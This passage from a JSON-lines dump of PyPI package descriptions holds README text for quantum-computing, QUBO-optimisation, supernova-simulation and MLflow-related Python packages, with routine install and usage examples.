Month Lost to Moon: 0.27\n - band: z\n day of year of first scheduled observation: 3\n repeat every ? days: 3\n Fraction of Lunar Month Lost to Moon: 0.27\n\n###### K-CORRECTION GENERATION ######\nRest Frame Filter for K-corrections: g # This is the filter that the k-corrections are anchored to. The simulations will convert from this observed band magnitude to the rest frame magnitudes to calculate the k-correction.\nK-correction temporal resolution (days): 1.0 # Only increase the resolution here if you have many spectra in your database and k-corrections are taking too long to generate.\nOrder of polynomial used to fits k-corrections: 18 # Check the k-correction polynomial plots and tweak this value as needed.\nMinimum number of datapoints used to generate k-correction curve: 3 # If the are not enough spectra or too many spectra have been redshifted out of the range of the observed frame band-pass, then there are few points to generate a polynomial k-correction lightcurve. 3 is probably the barely-passable minimum.\n\n###### SIMULATED UNIVERSE CONSTRAINTS ######\nCCSN Progenitor Population Fraction of IMF: 0.007\nTransient to CCSN Ratio: 10e-5\nSimulation Sample: 50 # Number of transients to include in simulations. More = more accurate but sims take longer to run. 100 good for testing & 10,000 good for science.\nExtinctions:\n constant or random: constant # Parameter not yet implemented - leave as `constant`\n constant E(b-v): 0.023 # 0.023 is the mean for the PS1-MD fields\n host: # Parameter not yet implemented\n galactic: # Parameter not yet implemented\nRelative Rate Set to Use: SLSNe\nRelative SN Rates:\n SLSNe:\n SN2007bi: 0.5 # make sure transient names correspond to folder names containing thier spectral data-sets\n SLSN: 0.5\nSN Absolute Peak-Magnitude Distributions:\n magnitude:\n SN2007bi: -17.08\n SLSN: -20.21\n sigma:\n SN2007bi: 0.001\n SLSN: 0.001\n\n###### LIGHTCURVE GENERATION & CONSTRAINTS\nLightcurves:\n SN2007bi:\n End of lightcurve relative to peak: 300 # Constrain the end of the lightcurve so polynomial fits don't go awal\n SLSN:\n End of lightcurve relative to peak: 220\nOrder of polynomial used to fits lightcurves: 6 # Check the extracted lightcurve plots and tweak this value as needed.\n# Often it is useful to set a an explosion day (relative to the timescale used in naming the files in the spectral database).\n# This helps constrain the polynomials of the light- and K-correction- curves generated in the simulations.\n# SET TO `None` TO DISREGARD THIS SETTING\nExplosion Days:\n SLSN: -70\n SN2007bi: -70\n# You can also extend the tail of the lightcurve to better constrain the polynomial. Set to `True` or `False`\nExtend lightcurve tail?:\n SLSN: True\n SN2007bi: True\n\n###### LOGGING\nLevel of logging required: WARNING # DEBUG, INFO, WARNING, ERROR or CRITICALThe QUBITS Simulation StagesThe four stages of the simulation are:Extracting the Lightcurves from SpectraGenerating a K-Correction DatabaseRunning the Simulation, andCompiling and Plotting ResultsAt the top of this settings file you turn the various stages of the\nsimulation build on and off:Program Settings:\n # STAGE 1 - LIGHTCURVES\n Extract Lightcurves from Spectra: True\n # STAGE 2 - KCORRECTION DATABASE\n Generate KCorrection Database: True\n Generate KCorrection Plots: True # ONLY SET TO TRUE IF ONLY A FEW KCORRECTIONS ARE TO BE CALCULATED\n # STAGE 3 - RUNNING SIMULATION\n Run the Simulation: True\n Plot Simulation Helper Plots: True # ONLY PLOT IF DEBUGGING\n # STAGE 4 - COMPILING RESULTS\n Compile and Plot Results: True\n Simulation Results File Used for Plots: simulation_results_20130919t131758.yamlWhen you first use the simulations it\u2019s best to set all stages of the\nsimulation toFalse, then incrementally run the code through each\nstage. You will always run the code with thequbits runcommand with\nthe following syntax:bash qubits run-s-o-dSo to run QUBITS with our template workspace we setup in the quick start\nworkspace above, we run:bash qubits run-s~/Desktop/qubits_workspace/qubits_settings.yaml-o~/Desktop/qubits_workspace/qubits_output-d~/Desktop/qubits_workspace/qubits_spectral_databaseBelow you will find details of each build stage of the simulation - read\nthe settings file comments to determine which settings you need to\ntailor for the simulation you are trying to run.1. Extracting the Lightcurves from SpectraThis stage generates thez=0lightcurves. Lightcurve plots are\ncreated in theplotsfolder in the output directory. Please note\nQUBITS\u2019 ability to generate decent lightcurves relies heavily on the\nquality of your spectral database; it needs good wavelength coverage to\nbe able to synthesize the photometry and good temporal coverage to build\nan entire lightcurve. The extracted lightcurves are stored as python\nobjects in the a file\ncalledtransient_light_curves.yamlin.Once you\u2019ve generated the lightcurves, have a look at the lightcurve\nplots (some may be blank if temporal/wavelength coverage was deemed too\npoor to create a lightcurve for the given band-pass atz=0). You may\nwant to tweak some lightcurve parameters in the settings file and\nrebuild the lightcurve plots. Once you\u2019re happy move onto the next\nstage.example lightcurveCurrent filters are the PS1g,r,i,zfilters.Notepysynphotcan be very chatty and prints log messages straight to\nstdout which can\u2019t be turned off easily. Don\u2019t worry if you see\nsomething like this:\u2026 does not have a defined binset in the wavecat table. The waveset\nof the spectrum will be used instead.2. Generate K-Correction DatabaseThe code will use the spectra to generate a database of K-corrections\nwith the given settings. They will be created in thek_correctionsdirectory of your output folder. For each redshift and k-correction\nfilter-set, a dataset is generated which is used to create a polynomial\nforrest frame epochvskcorrection. Note the k-corrections also act\nas colour-transformations between filters at low-redshift.By settingGenerateK-CorrectionPlotstoTruea plot for each\nK-correction dataset will be generated. Set this to true if only a few\nk-corrections are to be calculated, i.e. when you are testing/debugging\nthe simulation - otherwise the k-correction generation will take\nforever!example k-correction polynomial3. Run the SimulationHere the simulation is run using the settings found in the settings file\n(cadence of observation, limiting-magnitudes, survey volume, loss due to\nweather etc). This stage is a two part process:Simulating the Universe- placing SNe throughout the volume\nrequested at random redshifts, with the relative-rate supplied and\nwith the peak magnitude distributions given.Simulating the Survey- simulates the survey with the setup\nsupplied in the settings files with cadence of observation,\nlimiting-magnitudes, survey volume, loss due to weather etc.The results of the simulation are place in a (large) date-time stamped\nyaml file in the output folder named something similar tosimulation_results_20130425t053500.yaml. The date-time appended to\nthe filename will be the time the simulation was run so you can run many\nsimulations without worrying about overwriting previous outputs. The\nsettings used to run the simulation are also recorded in this file.ThePlot Simulation Helper Plotssetting should only be set toTrueif you are trying to debug the code and work out how the input\ndata is being manipulated to create the simulations.4. Compile and Plot ResultsUse theSimulation Results File Used for Plotssetting to set the\nsimulation results file used to generate the result plots and log:Simulation Results File Used for Plots: simulation_results_20130425t053500.yamlThis compiles the results into a markdown file (plain text with minimal\nmarkup) and a styled HTML file into the/resultsfolder with names similar to:simulation_result_log_20130426t110856.md\nsimulation_result_log_20130426t110856.htmlHere is an example of the output log file:example results fileWARNINGSQUBITS can return many warnings, usually related the limitations of your\nspectral databases. Here are some:\u2018does not have a defined binset in the wavecat table. The waveset\nof the spectrum will be used instead.\u2019: This is a pysynphot message\nand not a QUBITS log. Don\u2019t worry.\u2018 failed with this error: Spectrum and bandpass are disjoint\u2019:\nThis generally means the spectrum quoted doesn\u2019t cover the wavelength\nrange of the band-pass and therefore a magnitude can\u2019t be\nsynthesised.\u2018Spectrum and bandpass do not fully overlap. You may use\nforce=[extrap|taper] to force this Observation anyway.\u2019: As above\nbut the spectral wavelength range does partially cover the band-pass\u2018could not find the magnitude from spectrum /***/t+601.00.spec\nusing the filter sdss,g - failed with this error: Integrated flux is\n<= 0\u2019: This generally means the spectrum quoted doesn\u2019t entirely\ncover the wavelength range of the band-pass and therefore a magnitude\ncan\u2019t be synthesised.\u2018the k-correction file z0pt30.yaml contains less than 3 datapoints\nto convert from g restframe to z observed frame for the SNOne model -\npolynomial shall not be generated\u2019: The was not enough\ntemporal/wavelength coverage to generate k-corrections for the quoted\nrest/observed frame filter-set at this redshiftIssuesPlease report any issueshere.Pull requestsare\nwelcomed!LicenseCopyright (c) 2016 David YoungPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the\n\u201cSoftware\u201d), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish,\ndistribute, sublicense, and/or sell copies of the Software, and to\npermit persons to whom the Software is furnished to do so, subject to\nthe following conditions:The above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "qubit-simulator", "pacakge-description": "Qubit SimulatorQubit Simulator is a simple and lightweight library that provides a quantum simulator for simulating qubits and quantum gates. It supports basic quantum operations and gates such as Hadamard, \u03c0/8, Controlled-Not, and generic unitary transformations.InstallationInstall Qubit Simulator via pip:pipinstallqubit-simulatorUsageInitializing the SimulatorCreate a simulator with a specified number of qubits:fromqubit_simulatorimportQubitSimulatorsimulator=QubitSimulator(3)Applying GatesApply various quantum gates to the qubits:simulator.h(0)# Hadamard gatesimulator.t(1)# \u03c0/8 gatesimulator.cx(0,2)# Controlled-Not gateCustom GatesDefine and apply custom gates using angles:simulator.u(2,0.3,0.4,0.5)# Generic gateMeasurementsMeasure the state of the qubits:print(simulator.run(shots=100)){'000': 46, '001': 4, '100': 4, '101': 46}Circuit RepresentationGet a string representation of the circuit:print(simulator)-----------------------------------\n| H | | @ | |\n| | T | | |\n| | | X | U(0.30, 0.40, 0.50) |\n-----------------------------------Wavefunction PlotShow the amplitude and phase of all quantum states:simulator.plot_wavefunction()TestingTests are included in the package to verify its functionality and provide more advanced examples:python3-mpytesttests/LicenseThis project is licensed under the MIT License."} +{"package": "qublets", "pacakge-description": "QubletsQublets is an approachable Quantum Computing Library written in Python using Intel'sintel-qsQuantum Computing Simulator. The goal of the library is to make introductory quantum computing approachable at the undergraduate (or lower) level.SetupIf you are on Unix, the easiest way to start using qublets is by installing the pre-compiledpip module:pipinstallqubletsIf you don't havepipinstalled, it takes 30 seconds and it will make your life managing Python deps much easier:cd~\ncurlhttps://bootstrap.pypa.io/get-pip.py>get-pip.py\npython3get-pip.pyIf you arenoton Unix or don't want to install pip, you can alwaysbuild from sourceGetting StartedQublets makes it easy to run simple quantum examples. Consider the classic \"Superposition qubit\" case:fromqubletsimportQUIntresult=QUInt.zeros(1).hadamard().measure()print(result)As you can see, Qublets aims to be as readable as possible (although you can customize quite a bit later). Running the code above will yield a150% of the cases and a0the rest. That's it. You may also notice (most) Qublets operators are chainable and will return the object they operated on - this makes building circuits a breeze.If you're familiar with quantum state names, you can make the above example even shorter by using a|+\u3009state:fromqubletsimportQUIntresult=QUInt.pluses(1).measure()print(result)You may have noticed Qublets supports integers natively - in fact, it supports both unsigned and signed integers of any given size (that your computer can work with without combusting in flames). The example above easily generalizes to a 4-bit QInt:fromqubletsimportQIntresult=QInt.pluses(4).measure()print(result)Now, you'd instead get a (mostly) uniformly random number between-8and7.It wouldn't really be a quantum computing library if we didn't entangle some bits so let's do that quickly:fromqubletsimportQUIntq1=QUInt.zeros(2)q1[0].hadamard()q1[1].c_negate(on=q1[0])print(q1.measure())# Or, just like before, we can use a shortcutprint(QUInt.fully_entangled(2).measure())If you're familiar with quantum computing's ABCs, you'd likely be happy to see only0and3as the possible values of the measurements. That's because the classichad/cnotcombo will give us a perfect|\u03a6+\u3009state (a bell pair) to work with.fully_entangled, on the other hand, will always entangle all the bits in aQIntusing a chain ofcnots - which would be equivalent for only 2 bits.Qublets also supports cross-q(u)int operations, built-in primitives, batch runs for your circuits, extracting probability amplitudes and more - you can find some inspirational samples indocs/examples/"} +{"package": "qubo", "pacakge-description": "QUBOA Quadratic Unconstrained Binary Optimization (QUBO) problem is an NP-hard problem which aims at minimizing\n$$x^T Q x = \\sum_{i \\leq j} Q_{ij}x_{i}x{j}$$\nwhere $Q$ is an upper triangular matrix and $x_1$, ..., $x_N$ are binary variables.A wide range of optimization problems can be formulated as QUBO models."} +{"package": "qubogen", "pacakge-description": "QUBOgenQUBO matrix generator on major combinatorial optimization problems written in PythonInstallation$gitclonehttps://github.com/tamuhey/qubogen\n$cdqubogen\n$pipinstall-e.UsageSeeNumber Partitioning example in JupyterNotebookRefsA Tutorial on Formulating and Using QUBO ModelsMIT LicenseCopyright (c) 2019 tamuheyPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qubole-ml", "pacakge-description": "MLflow is a platform to streamline machine learning development, including tracking experiments, packaging code\ninto reproducible runs, and sharing and deploying models. MLflow offers a set of lightweight APIs that can be\nused with any existing machine learning application or library (TensorFlow, PyTorch, XGBoost, etc), wherever you\ncurrently run ML code (e.g. in notebooks, standalone applications or the cloud). MLflow\u2019s current components are:MLflow Tracking: An API to log parameters, code, and\nresults in machine learning experiments and compare them using an interactive UI.MLflow Projects: A code packaging format for reproducible\nruns using Conda and Docker, so you can share your ML code with others.MLflow Models: A model packaging format and tools that let\nyou easily deploy the same model (from any ML library) to batch and real-time scoring on platforms such as\nDocker, Apache Spark, Azure ML and AWS SageMaker.MLflow Model Registry: A centralized model store, set of APIs, and UI, to collaboratively manage the full lifecycle of MLflow Models.InstallingInstall MLflow from PyPI viapip install mlflowMLflow requirescondato be on thePATHfor the projects feature.Nightly snapshots of MLflow master are also availablehere.DocumentationOfficial documentation for MLflow can be found athttps://mlflow.org/docs/latest/index.html.CommunityFor help or questions about MLflow usage (e.g. \u201chow do I do X?\u201d) see thedocsorStack Overflow.To report a bug, file a documentation issue, or submit a feature request, please open a GitHub issue.For release announcements and other discussions, please subscribe to our mailing list (mlflow-users@googlegroups.com)\nor join us onSlack.Running a Sample App With the Tracking APIThe programs inexamplesuse the MLflow Tracking API. For instance, run:python examples/quickstart/mlflow_tracking.pyThis program will useMLflow Tracking API,\nwhich logs tracking data in./mlruns. This can then be viewed with the Tracking UI.Launching the Tracking UIThe MLflow Tracking UI will show runs logged in./mlrunsathttp://localhost:5000.\nStart it with:mlflow uiNote:Runningmlflow uifrom within a clone of MLflow is not recommended - doing so will\nrun the dev UI from source. We recommend running the UI from a different working directory,\nspecifying a backend store via the--backend-store-urioption. Alternatively, see\ninstructions for running the dev UI in thecontributor guide.Running a Project from a URIThemlflow runcommand lets you run a project packaged with a MLproject file from a local path\nor a Git URI:mlflow run examples/sklearn_elasticnet_wine -P alpha=0.4\n\nmlflow run https://github.com/mlflow/mlflow-example.git -P alpha=0.4Seeexamples/sklearn_elasticnet_winefor a sample project with an MLproject file.Saving and Serving ModelsTo illustrate managing models, themlflow.sklearnpackage can log scikit-learn models as\nMLflow artifacts and then load them again for serving. There is an example training application inexamples/sklearn_logistic_regression/train.pythat you can run as follows:$ python examples/sklearn_logistic_regression/train.py\nScore: 0.666\nModel saved in run \n\n$ mlflow models serve --model-uri runs://model\n\n$ curl -d '{\"columns\":[0],\"index\":[0,1],\"data\":[[1],[-1]]}' -H 'Content-Type: application/json' localhost:5000/invocationsContributingWe happily welcome contributions to MLflow. Please see ourcontribution guidefor details."} +{"package": "qubolepystream", "pacakge-description": "PyQuboleA watered down version of Qubole's Python connector providing a much simpler API to interact with for running streaming queries or submitting a job and rerieving its output at a later time (sync or async). Allowing for easy use in notebooks or integration in projects without much overhead. Based on Qubole QDS-SDK-Pyhttps://github.com/qubole/qds-sdk-pyInstalltionFrom PyPIThe library is available onPyPI - PyQubole.$ pip install qubolepystreamFrom Source\u2022Get source code: SSHgit@github.com:achilleasatha/PyQubole.gitor HTTPShttps://github.com/achilleasatha/PyQubole.git\u2022Install by runningpython setup.py installAPIYou can find an example application inexample/main.pyincluding a Spark command exampleexample/spark_example.py.More info on running Spark commands:Qubole docs - Submit a Spark commandAn example application needs to do:Import the libfrom qubolepystream.connector import QuboleConnectorSet the api_token and instantiate the connectioncon = QuboleConnector(api_token='api_token')Use the query data method to run a job, specifying the input query, engine and cluster (or just job_id):data = con.query_data(sql_query=query, job_id=None, engine='Hive', cluster='Hive_cluster_name', verbose=False)Note:a) Query can be passed as a raw stringquery = r\"\"\"select * from table\"\"\"or from a file:query = open('query.sql').read()b) Ifjob_id = Nonethe query will be executed on the engine specified ('Hive', 'Presto' or 'Spark'')c) Ifjob_id = '123456'then the results of the job will be retrieved (if job status is done)d) You can use the optional methodverbose = True / Falseto get streaming logs output or only status updates"} +{"package": "qubole-tco", "pacakge-description": "No description available on PyPI."} +{"package": "qubolite", "pacakge-description": "quboliteA light-weight toolbox for working with QUBO instances in NumPy.Installationpip install quboliteThis package was created using Python 3.10, but runs with Python >= 3.8.Optional DependenciesIf you're planning to use the roof dual function as lower bound you will need to install optional\ndependencies. The igraph based roof dual lower bound function can be used by callingqubolite.bounds.lb_roof_dual(). It requires that theigraphlibrary is\ninstalled. This can be done withpip install igraphor by installing qubolite withpip install qubolite[roof_dual].Using the functionqubolite.ordering_distance()requires the Kendall-\u03c4 measure from thescipylibrary which can be installed bypip install scipyor by installing\nqubolite withpip install qubolite[kendall_tau].For exemplary QUBO embeddings (e.g. clustering or subset sum), thescikit-learnlibrary is required. It can be installed by either usingpip install scikit-learnor installing qubolite withpip install qubolite[embeddings].If you would like to install all optional dependencies you can usepip install qubolite[all]for\nachieving this.Usage ExamplesBy design,quboliteis a shallow wrapper aroundnumpyarrays, which represent QUBO parameters.\nThe core class isqubo, which receives anumpy.ndarrayof size(n, n).\nAlternatively, a random instance can be created usingqubo.random().>>> import numpy as np\n>>> from qubolite import qubo\n>>> arr = np.triu(np.random.random((8, 8)))\n>>> Q = qubo(arr)\n>>> Q2 = qubo.random(12, distr='uniform')By default,qubo()takes an upper triangle matrix.\nA non-triangular matrix is converted to an upper triangle matrix by adding the lower to the upper triangle.To get the QUBO function value, instances can be called directly with a bit vector.\nThe bit vector must be anumpy.ndarrayof size(n,)or(m, n).>>> x = np.random.random(8) < 0.5\n>>> Q(x)\n7.488225478498116\n>>> xs = np.random.random((5,8)) < 0.5\n>>> Q(xs)\narray([5.81642745, 4.41380893, 11.3391062, 4.34253921, 6.07799747])SolvingThe submodulesolvingcontains several methods to obtain the minimizing bit vector or energy value of a given QUBO instance, both exact and approximative.>>> from qubolite.solving import brute_force\n>>> x_min, value = brute_force(Q, return_value=True)\n>>> x_min\narray([1., 1., 1., 0., 1., 0., 0., 0.])\n>>> value\n-3.394893116198653The methodbrute_forceis implemented efficiently in C and parallelized with OpenMP.\nStill, for instances with more than 30 variables take a long time to solve this way.DocumentationThe complete API documentation can be foundhere.Version Log0.2Added problem embeddings (binary clustering, subset sum problem)0.3AddedQUBOSampleclass and sampling methodsfullandgibbs0.4RenamedQUBOSampletoBinarySample; added methods for saving and loading QUBO and Sample instances0.5Movedgibbstomcmcand implemented true Gibbs sampling asgibbs; addednumbaas dependency0.5.1changedkeep_probtokeep_intervalin Gibbs sampling, making the algorithm's runtime deterministic; renamedsampletorandomin QUBO embedding classes, added MAX 2-SAT problem embedding0.6Changed Python version to 3.8; removedbitvecdependency; addedscipydependency required for matrix operations in numba functions0.6.1added scaling and rounding0.6.2removedseedpydependency0.6.3renamedshotstosizeinBinarySample; cleaned up sampling, simplified type hints0.6.4added probabilistic functions toquboclass0.6.5complete empirical prob. vector can be returned fromBinarySample0.6.6fixed spectral gap implementation0.6.7movedbrute_forceto new sub-modulesolving; added some approximate solving methods0.6.8addedbitvecsub-module;dynamic_rangenow uses bits by default, changedbits=Falsetodecibel=False; removed scipy from requirements0.6.9new, more memory-efficient save format0.6.10fixed requirements insetup.py; fixed size estimation inqubo.save()0.7Added more efficient brute-force implementation using C extension; added optional dependencies for calculating bounds and ordering distance0.8New embeddings, new solving methods; switched to NumPy random generators fromRandomState; added parameter compression for dynamic range reduction; Added documentation0.8.1some fixes to documentation0.8.2implementedqubo.dx2(); added several new solving heuristics0.8.3added submodulepreprocessingand moved DR reduction there; addedpartial_assignmentclass as replacement ofqubo.clamp(), which is now deprecated0.8.4added fast Gibbs sampling and QUBO parameter training"} +{"package": "qubo-nn", "pacakge-description": "QUBO - NN9 problems and their respective QUBO matrices.QUBO matrices are used to describe an optimization problem as a matrix such that a Quantum Annealer (such as a D-Wave QA) can solve it.Now, these matrices are quite an interesting construct.. Thus, a few questions arise:Is it possible to classify the problem class based on the QUBO matrix?Is it possible to reverse-engineer the problem parameters that led to a QUBO matrix?Let's find out.pip install qubo-nnProject StructureFilePurposedatasets/Contains generated datasets.models/Contains trained models.nn/Contains neural network models.plots/Contains plotting scripts and generated plots.problems/Contains generators and evaluators for specific problems such as 3SAT or TSP.runs/Contains tensorboard logging files.config.pyConfiguration (json) handling.data.pyLMDB data handling.main.pyMain entry point.pipeline.pyEnd to end training and testing of NNs on QUBO matrices.simulations.jsonAll experiments and configurations.Problems implemented so far:Number PartitioningMaximum CutMinimum Vertex CoverSet PackingMaximum 2-SATSet PartitioningGraph ColoringQuadratic AssignmentQuadratic KnapsackMaximum 3-SATTravelling Salesman (TSP)Graph IsomorphismSub-Graph IsomorphismMaximum CliqueSetuppip install qubo-nnORpip3 install -r requirements.txt\npip3 install -e .UsingClassification / Reverse regressionusage: main.py [-h] [-t TYPE] [--eval] [--gendata] [--train] [-c CFG_ID] [-m [MODEL]] [-n [NRUNS]]\n\noptional arguments:\n -h, --help show this help message and exit\n -t TYPE, --type TYPE Type (classify, reverse)\n --eval\n --gendata\n --train\n -c CFG_ID, --cfg_id CFG_ID\n cfg_id\n -m [MODEL], --model [MODEL]\n -n [NRUNS], --nruns [NRUNS]Examples for classification:python3 -m qubo_nn.main -t classify -c 2 --train\npython3 -m qubo_nn.main -t classify -c 2 --eval -m models/21-02-16_20\\:28\\:42-9893713-instances-MacBook-Pro.local-2Examples for reverse regression:python3 -m qubo_nn.main -t reverse -c tsp1 --gendata\npython3 -m qubo_nn.main -t reverse -c tsp1 --train -n 1Generating QUBOs for arbitrary problemsThis is an example on how to create a MaxCut instance and generate a QUBO matrix for it:>>> graph = networkx.Graph([(1, 2), (1, 3), (2, 4), (3, 4), (4, 5), (3, 5)])\n>>> problem = MaxCut(graph)\n>>> matrix = problem.gen_qubo_matrix()\n[\n [2, -1, -1, 0, 0],\n [-1, 2, 0, -1, 0],\n [-1, 0, 3, -1, -1],\n [0, -1, -1, 3, -1],\n [0, 0, -1, -1, 2]\n]The list of problems can be found inqubo_nn/problems/__init__.py. Also:>>> from qubo_nn.problems import PROBLEM_REGISTRY\n>>> PROBLEM_REGISTRY\n{\n 'NP': ,\n 'MC': ,\n 'MVC': ,\n 'SP': ,\n 'M2SAT': ,\n 'SPP': ,\n 'GC': ,\n 'QA': ,\n 'QK': ,\n 'M3SAT': ,\n 'TSP': ,\n 'GI': ,\n 'SGI': ,\n 'MCQ': \n ...\n}ResultsThe pipeline of interest is as follows.Given some QUBO matrix that was generated using a set of problem parameters, we first classify the problem in step a and then predict the parameters in step b.ClassificationUsing parameter configuration100_genX(seesimulations.json), the average\ntotal misclassification rate over 20 models goes to near zero. The figure\nincludes the 95% confidence interval. Scrambling QUBOs leads to a nearly\nsimilar effect. Note that this is using a generalized dataset, i.e. the dataset\nconsists of not just 64x64 QUBO matrices for each problem, but also smaller\nsizes such as 32x32. The smaller sizes are zero-padded to the biggest supported\nsize, which most of the time is 64x64 and in rare cases goes up to 144x144 (for\nQuadratic Assignment).The t-SNE plot for this experiment is shown below.Reverse regressionThis is preliminary. Some of the problems are easily learned by a neural network regressor. Each line represents 10 models and includes the 95% confidence interval.ReversibilityThis shows whether we can deduce the parameters that led to a QUBO matrix, given we predicted the problem beforehand.\nA lot of the graph based problems are easily reversable since the graph structure is kept intact in the QUBO matrix. Thus we can recreate the graph and other input parameters given a GraphColoring QUBO matrix.This is still WIP - needs testing. These are hypotheses.Reversing some problems like Quadratic Knapsack might be possible - an algorithm is an idea, but one could also make their life easy and try fitting a NN model to it.ProblemReversibilityCommentGraph Coloring+Adjacency matrix found in QUBO.Maximum 2-SAT?Very complex to learn, but possible? C.f.m2sat_to_bip.pyincontrib.Maximum 3-SAT?Very complex to learn, but possible?Maximum Cut+Adjacency matrix found in QUBO.Minimum Vertex Cover+Adjacency matrix found in QUBO.Number Partitioning+Easy, create equation system from the upper triangular part of the matrix (triu).Quadratic Assignment+Over-determined linear system of equations -> solvable. P does not act as salt. A bit complex to learn.Quadratic Knapsack-Budgets can be deduced easily (Find argmin in first row. This column contains all the budgets.). P acts as a salt -> thus not reversible.Set Packing-Multiple problem instances lead to the same QUBO.Set Partitioning-Multiple problem instances lead to the same QUBO.Travelling Salesman+Find a quadrant with non-zero entries (w/ an identical diagonal), transpose, the entries are the distance matrix. Norm result to between 0 and 1.Graph Isomorphism+Adjacency matrix found in QUBO.Sub-Graph Isomorphism+Adjacency matrix found in QUBO.Maximum Clique+Adjacency matrix found in QUBO.Redundancy of QUBOs with AutoEncodersThe figure below shows that there are major differences between problem classes\nin terms of their overall redundancy.ContributingPull requests are very welcome. Before submitting one, run all tests with./test.shand make sure nothing is broken.ReferencesGlover, Fred, Gary Kochenberger, and Yu Du. \"A tutorial on formulating and using qubo models.\" arXiv preprint arXiv:1811.11538 (2018).\nMichael J. Dinneen, \"Maximum 3-SAT as QUBO\" https://canvas.auckland.ac.nz/courses/14782/files/574983/download?verifier=1xqRikUjTEBwm8PnObD8YVmKdeEhZ9Ui8axW8HwP&wrap=1\nLucas, Andrew. \"Ising formulation of many NP-problems. Frontiers in Physics\" (2014)\nCristian S. Calude, Michael J. Dinneen and Richard Hua. \"QUBO Formulations for the Graph Isomorphism Problem and Related Problems\" (2017)Related WorkHadamard Gate Transformation for 3 or more QuBitsQUBOs for TSP and Maximum-3SATQUBO-NN - Reverse-Engineering QUBO matricesA note on Adiabatic Evolution in Quantum AnnealingQuantum Annealing Hamiltonian Example CalculationList of QUBO formulations (48)"} +{"package": "qubot", "pacakge-description": "\ud83e\udd16 QubotAn autonomous exploratory testing library for Python.AboutQubot was created out of inspiration to create a fully autonomous testing bot to mimic a real-life\nQA-tester.Seethe Qubot paperto learn more about the design decisions and the Q-learning approach behind\nthis repository. Moreover, seeexperiments.ipynbfor the experiment\nmentioned in paper.Hours of painstaking work have been put into this project thus far, and we hope this\nlibrary finds actual use in the field of autonomous software testing.Getting StartedTo get started with Qubot, simply download the library into your project's repository from PyPi:pip install qubotThis will download all necessary dependencies, as well as install thequbotcommand line program\nin your current Python environment.Run ProgrammaticallyYou can specify each aspect of your test programmatically, and run it all within the same code file.from qubot import Qubot, QubotConfigTerminalInfo, QubotConfigModelParameters, QubotDriverParameters, QubotPresetRewardFunc\n\nqb = Qubot(\n url_to_test=\"https://upmed-starmen.web.app/\",\n terminal_info_testing=QubotConfigTerminalInfo(\n terminal_ids=[],\n terminal_classes=[\"SignIn_login_hcp__qYuvP\"],\n terminal_contains_text=[],\n ),\n terminal_info_training=QubotConfigTerminalInfo(\n terminal_ids=[],\n terminal_classes=[],\n terminal_contains_text=[\"Log in as a Healthcare Provider\"],\n ),\n driver_params=QubotDriverParameters(\n use_cache=False,\n max_urls=10,\n ),\n model_params=QubotConfigModelParameters(\n alpha=0.5,\n gamma=0.6,\n epsilon=1,\n decay=0.01,\n train_episodes=1000,\n test_episodes=100,\n step_limit=100,\n ),\n reward_func=QubotPresetRewardFunc.ENCOURAGE_EXPLORATION,\n input_values={\n \"color\": \"#000000\",\n \"date\": \"2021-01-01\",\n \"datetime-local\": \"2021-01-01T01:00\",\n \"email\": \"johndoe@gmail.com\",\n \"month\": \"2021-01\",\n \"number\": \"1\",\n \"password\": \"p@ssw0rd\",\n \"search\": \"query\",\n \"tel\": \"123-456-7890\",\n \"text\": \"text\",\n \"time\": \"00:00:00.00\",\n \"url\": \"https://www.google.com/\",\n \"week\": \"2021-W01\"\n }\n)\nqb.run()\nprint(qb.get_stats())See the source code for descriptions of each configuration property. If you'd like to stick with\ndefault values, yourQubotinstantiation may look as short as the following:qb = Qubot(\n url_to_test=\"https://upmed-starmen.web.app/\",\n QubotConfigTerminalInfo(\n terminal_ids=[],\n terminal_classes=[\"SignIn_login_hcp__qYuvP\"],\n terminal_contains_text=[],\n )\n)Run Programmatically via a Configuration FileShorten the Qubot setup code by adding a Qubot configurationJSONfile in the same directory, as follows:qu_config.json{\n\t\"url\": \"https://upmed-starmen.web.app/\",\n\t\"terminal_info\": {\n\t\t\"training\": {\n \"ids\": [],\n \"classes\": [\n \"SignIn_login_hcp__qYuvP\"\n ],\n \"contains_text\": []\n\t\t},\n\t\t\"testing\": {\n \"ids\": [],\n \"classes\": [],\n \"contains_text\": [\n \"Log in as a Healthcare Provider\"\n ]\n\t\t}\n\t},\n\t\"driver_parameters\": {\n\t \"use_cache\": false,\n\t \"max_urls\": 1\n\t},\n\t\"model_parameters\": {\n\t\t\"alpha\": 0.5,\n\t\t\"gamma\": 0.6,\n\t\t\"epsilon\": 1,\n\t\t\"decay\": 0.01,\n\t\t\"train_episodes\": 1000,\n\t\t\"test_episodes\": 100,\n\t\t\"step_limit\": 100\n\t},\n\t\"reward_func\": 3,\n\t\"input_values\": {\n \"color\": \"#000000\",\n 